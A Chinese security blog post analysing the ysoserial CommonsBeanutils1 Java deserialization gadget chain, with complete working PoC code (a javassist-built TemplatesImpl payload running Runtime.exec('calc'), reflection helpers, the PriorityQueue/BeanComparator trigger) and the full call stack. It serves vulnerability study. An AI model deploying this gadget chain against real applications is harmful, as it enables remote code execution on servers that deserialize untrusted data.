『Java安全』反序列化-CB反序列化漏洞POP链分析_ysoserial CommonsBeanutils1 PoC分析

最新推荐文章于 2024-07-02 22:25:41 发布
最新推荐文章于 2024-07-02 22:25:41 发布
阅读量3k 收藏
点赞数
分类专栏: # 反序列化 文章标签: java安全 反序列化 ysoserial web安全 cb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/123477992
版权

文章目录

前言

CB1类似CC2,利用优先级队列触发comparator的compare方法,需要以下依赖:

        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.1</version>
        </dependency>

        <!-- https://mvnrepository.com/artifact/commons-beanutils/commons-beanutils -->
        <dependency>
            <groupId>commons-beanutils</groupId>
            <artifactId>commons-beanutils</artifactId>
            <version>1.9.2</version>
        </dependency>

        <!-- https://mvnrepository.com/artifact/commons-logging/commons-logging -->
        <dependency>
            <groupId>commons-logging</groupId>
            <artifactId>commons-logging</artifactId>
            <version>1.2</version>
        </dependency>

代码复现

工具类

生成恶意TemplatesImpl:

TemplatesGeneratorPacked/GetAbstractTranslet.java

package TemplatesGeneratorPacked;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.*;

public class GetAbstractTranslet {
    public static byte[] generate() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("e");
        CtClass zuper = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(zuper);

        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("{Runtime.getRuntime().exec(\"calc\");}");
        clazz.addConstructor(constructor);

        return clazz.toBytecode();
    }
}

TemplatesGeneratorPacked/GetTemplatesImpl.java

package TemplatesGeneratorPacked;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import ReflectPacked.ValueGetterSetter;

public class GetTemplatesImpl {
    public static TemplatesImpl getTemplatesImpl() throws Exception{
        byte[][] bytes = new byte[][]{GetAbstractTranslet.generate()};

        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        ValueGetterSetter.setValue(templates, "_bytecodes", bytes);
        ValueGetterSetter.setValue(templates, "_name", "a");
        ValueGetterSetter.setValue(templates, "_tfactory", new TransformerFactoryImpl());

        return  templates;
    }
}

反射get/set:

ReflectPacked/ValueGetterSetter.java

package ReflectPacked;

import java.lang.reflect.Field;

public class ValueGetterSetter {
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static Object getValue(Object obj, String name) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        return field.get(obj);
    }
}

反序列化:

UnserializePacked.Unserialize.java

package UnserializePacked;

import java.io.*;

public class Unserialize {
    public static void unserialize(Object obj) throws Exception{
        File f = File.createTempFile("temp", "out");

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
        oos.writeObject(obj);
        oos.close();

        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
        Object o = ois.readObject();
        System.out.println(o);
        ois.close();

        f.deleteOnExit();
    }
}

PoC

package cb1;

import java.util.PriorityQueue;
import org.apache.commons.beanutils.BeanComparator;
import java.math.BigInteger;
import javax.xml.transform.Templates;

import ReflectPacked.ValueGetterSetter;
import TemplatesGeneratorPacked.GetTemplatesImpl;
import UnserializePacked.Unserialize;


public class PoC {
    public static void main(String[] args) throws Exception {
        Templates templates = GetTemplatesImpl.getTemplatesImpl();
        BeanComparator comparator = new BeanComparator("lowestSetBit");
        PriorityQueue priorityQueue = new PriorityQueue(2, comparator);
        priorityQueue.add(new BigInteger("1"));
        priorityQueue.add(new BigInteger("1"));

        ValueGetterSetter.setValue(comparator, "property", "outputProperties");

        Object[] queueArray = (Object[]) ValueGetterSetter.getValue(priorityQueue, "queue");
        queueArray[0] = templates;

        Unserialize.unserialize(priorityQueue);
    }
}

代码审计 | 原理分析

前半部分类似CC2,优先级队列反序列化调用compare

『Java安全』反序列化-CC2反序列化漏洞POP链分析_ysoserial CommonsCollections2 PoC分析

后半部分流程调用了TemplatesImpl.getOutputProperties(),同7u21

『Java安全』反序列化-Jdk7u21 POP链分析_ysoserial Jdk7u21 payload 分析_TemplateImpl触发反序列化漏洞

重复的部分不做分析只作记录

1. TemplatseImpl.getOutputProperties()触发newTransformer()

2. BeanComparator.compare()触发PropertyUtils.getProperty()

BeanComparator构造器传入一个property
在这里插入图片描述
调用compare方法时,会调各自Object的getProperty
在这里插入图片描述
因此可以构造的时候传入属性outputProperities,然后compare传入TemplatesImpl即可:
在这里插入图片描述

3. PriorityQueue反序列化调用comparator.compare()

优先级队列构造器传入初始大小和comparator,然后readObject会调用compare
在这里插入图片描述

为什么BeanComparator要传入lowestSetBit?为什么要添加BigInteger?

在这里插入图片描述
在新建comparator的时候传入了BigInteger的属性lowestSetBit,这里传BigInteger的其他属性也可以,这么做是为了保证某些jdk版本add失败的问题,修复兼容性问题

POP链

newTransformer:486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
getOutputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect) [2]
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeMethod:2116, PropertyUtilsBean (org.apache.commons.beanutils)
getSimpleProperty:1267, PropertyUtilsBean (org.apache.commons.beanutils)
getNestedProperty:808, PropertyUtilsBean (org.apache.commons.beanutils)
getProperty:884, PropertyUtilsBean (org.apache.commons.beanutils)
getProperty:464, PropertyUtils (org.apache.commons.beanutils)
compare:163, BeanComparator (org.apache.commons.beanutils)
siftDownUsingComparator:721, PriorityQueue (java.util)
siftDown:687, PriorityQueue (java.util)
heapify:736, PriorityQueue (java.util)
readObject:795, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect) [1]
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1909, ObjectInputStream (java.io)
readOrdinaryObject:1808, ObjectInputStream (java.io)
readObject0:1353, ObjectInputStream (java.io)
readObject:373, ObjectInputStream (java.io)
unserialize:14, Unserialize (UnserializePacked)
main:26, PoC (cb1)

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/xxx
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
专栏目录
JAVA反序列化漏洞-ysoserial-URLDNS链分析
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-29 911
对于进行反序列化漏洞原理的学习,URLDNS这条链比较好理解,对后续学习打个基础,URLDNS也是经常用于验证Java反序列化漏洞是否存在,验证服务主机是否出网等情况,为了后期进一步有效性的利用。让我们开始学习吧!
java反序列化漏洞-验证.rar
06-25
1. **Java反序列化漏洞**:当不信任的数据源提供的序列化对象被反序列化时,如果对象的类包含危险的方法(如`ObjectInputStream.readObject()`),攻击者可以构造特殊的序列化数据来触发这些方法,执行任意代码。...
Javaweb安全——反序列化漏洞-CC&CB链思路整理
weixin_43610673的博客
10-28 2383
如上图所示基本上起点终点就是那几个点然后相互拼接:《Shiro RememberMe 漏洞检测的探索之路》中Koalr师傅已经对CommonsCollections 系列 gadget进行了提纯变成以下四条对命令执行部分的调用分别为InvokerTransformer调用TemplatesImpl对 commons-Collections4 的适配则直接用替换。
【关于学习渗透】手把手教你玩转java反序列化cb
HBohan的博客
01-15 517
java反序列化cb链大家应该都玩过,博主当初是通过看shiro无依赖了解到的,最近在重学基础,就手把手一点一点调试一遍。记得11月份自博主反思之后,认为自己渗透的学习深度广度都太差,对漏洞的学习只是学了一层表面,老是这么搞可不行啊,花一两个月时间重新看了几百集java语言基础。这篇文章严格来说是学习java利用链的部分学习笔记,这也算博主部分学习的一小段总结吧,话不多说,直接开始
CB链分析与利用超详细
最新发布
2301_79700060的博客
07-02 1101
和 cc2 不同的是因为 cc2 最后是直接由 compare 调用的 transform 方法,而这里是通过 compare 去调用 getter 方法,所以还要控制 compare 方法的参数。Apache Commons Beanutils是Apache Common下的一个工具集下的另一个项目,提供对普通Java类对象(JavaBean)的一些操作方法。这里用到的 getProperty 和 setProperty 实际上就是调用的 javaBean 中的 getter 和 setter 方法。
查找场景中的Cbue和Sphere进行序列化和反序列化
Yuan_bowen的博客
03-20 335
public class XMlLIanxi : MonoBehaviour {              void Start () {        SceneDeat s = new SceneDeat();        //查找场景中的cube        GameObject[] cube = GameObject.FindGameObjectsWithTag("Cube");   ...
Java反序列化-CommonsBeanUtils 1链分析
cike_y
05-10 1255
这条链子是一个比较重要的链子,后续的shiro框架漏洞都会用到。打链子,需要注意对应的依赖去打
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
[Java反序列化]JDK7U21原生反序列化利用链分析
Y4tacker的博客
07-29 1328
文章目录写在前面利用链JDK7U21原生反序列化利用链分析流程跟踪参考文章 写在前面 这段时间看了也跟踪了CC链,CB链,也跟踪调试了shiro的两个链子,XMLDecoder等,就用JDKK7U21原生反序列化利用链来暂时结束下最近的学习 利用链 LinkedHashSet.readObject() LinkedHashSet.add() ... TemplatesImpl.hashCode() (X) LinkedHashSet.add() ... Pro
shiro反序列化漏洞与无依赖CB链分析
灰太的表格的博客
02-22 1311
shiro反序列化漏洞与无依赖CB链分析
爆赞好文之java反序列化CB超详细易懂分析
2301_79724395的博客
05-07 1085
CB链主要是通过优先队列和TemplatesImpl类完成的,如果你学习了CC链,这个链子就是得心应手为什么会出现CB2,因为CB1还是需要cc依赖的,而我们的cb2根本不需要cc的依赖就能够实现我们的反序列化了。
WebJava反序列化CB1链花样调TemplatesImpl打Shiro
uuzeray的博客
03-02 1239
如果 this.property 不为空,则用 PropertyUtils.getProperty 分别取传入的两个对象的 this.property 属性,而this.property是在BeanComparator的构造方法处传入的(也可以用反射来操作),完全可控。当o1/o2是一个 TemplatesImpl 对象时,property 的值为 outputProperties 时,我们就可调用TemplatesImpl#getOutputProperties(),完成攻击链的调用。
ysoserial-cc1 java反序列化
springgold的博客
09-01 348
yso-cc1 1. 从入口看 1)run方法 2)回到类的getobject 3)生成 transformer 反射链和lazymap对象 4)代理对象创建 使用代理实现类(AnnotationInvocationHandler) 5)返回代理类,反射ChainedTransformer的iTransformers属性赋值transformers(反射链) 6)返回AnnotationInvocationHandler 对象 7)序列化 8)所以入口就在AnnotationInvocation
ysoserial-CommonsBeanutils1的shiro无依赖链改造
洋洋的小黑屋
12-05 164
ysoserial-CommonsBeanutils1的shiro无依赖链改造 一、CB1利用链分析 此条利用链需要配合Commons-Beanutils组件来进行利用,在shiro中是自带此组件的。 先上大佬写的简化版利用链,和ysoserial中的代码有点不同,但原理是一样的 import com.sun.org.apache.xalan.internal.xsltc.trax.Templa...
CC1反序列化
v2ish1yan的博客
11-02 387
这个类是TransformedMap(上面的那个)的父类在AbstractInputCheckedMapDecorator的MapEntry静态类中的setValue()调用了} }Java的entry是一个静态内部类,实现Map.Entry< K ,V> 这个接口,通过entry类可以构成一个单向链表。这个MapEntry类继承了AbstractMapEntryDecorator,而AbstractMapEntryDecorator又实现了Map.Entry接口。
Java反序列化漏洞——CommonsBeanutils1链分析
Thunderclap的博客
02-20 1594
在创建类的对象的时候可以为comparator赋予特定的比较器,值得注意的是如果没有设定自定义的comparator,其默认为ComparableComparator对象,当然,在调用链中,将会调用他的compare方法。接收两个参数 bean (类对象)和 name(属性名),方法会返回这个类的这个属性的值,但是他不是直接通过反射取值,而是通过反射调用getter方法获取属性,进而经过恶意的构造,我们可以触发任意的getter方法。getter方法以get开头,setter方法以set开头。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值